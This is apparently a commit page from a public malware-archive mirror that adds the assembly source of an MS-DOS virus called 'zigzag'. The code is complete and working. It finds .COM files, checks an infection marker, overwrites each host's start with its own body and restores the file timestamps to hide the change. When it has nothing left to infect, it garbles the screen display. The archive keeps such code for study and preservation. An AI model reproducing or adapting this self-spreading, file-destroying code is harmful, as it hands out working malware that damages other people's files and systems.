daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-15 15:29:23 +00:00
Code Issues Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground
2021-01-12 17:26:43 -06:00
committed by GitHub
parent d782d1d3f3
commit 60045f672b
23 changed files with 13675 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSDOS/Virus.MSDOS.Unknown.zigzag.asm
+85
View File
@@ -0,0 +1,85 @@
code segment
assume cs:code, ds:code, es:code, ss:nothing
org 0100h
start: db 8Bh,0DBh
mov ah,4Eh ;find a file
mov cx,0000h ;
mov dx,offset filemask ;load searchmask, .COM
loopy: int 21h
jb effect ;no files, do effect
call infect
jnz exit
mov ah,4Fh ;find next file
jmp short loopy
;keep looping around
exit: mov ax,4C00h
int 21h
effect: mov ax,0040h ;no files to infect
mov es,ax ;slant the text on the screen
mov di,004Ah
mov al,51h
stosb
int 20h ;and exit
infect: mov ax,3D02h ;open host, r/w with handle
mov dx,009Eh
int 21h
xchg ax,bx ;exchange handle to ax
mov ah,3Fh ;read from file
mov cx,0002h ;two bytes
mov dx,offset ID ;put them in ID buffer
int 21h
cmp Word Ptr ds:[016Dh],0DB8Bh
;compare with virus ID
pushf
jz close_file
cwd
mov cx,dx ;
mov ax,4200h ;reset file pointer
;to beginning of file
int 21h
mov al,00h ;
mov ah,57h ;get file date/time
int 21h ;
push cx ;store them
push dx ;
mov ah,40h ;write virus
mov cx,007Fh ;to file
mov dx,0100h ;start at beginning
int 21h ;
mov al,01h ;restore file date/time
pop dx ;from the stack
pop cx ;
mov ah,57h ;
int 21h ;
close_file:
mov ah,3Eh ;close file
int 21h ;
popf ;
ret ;exit
ID: dw 0000h
filemask: db "*.COM" ;searchmask
db 00h
db "*ZZ* v 1.0"
code ends
end start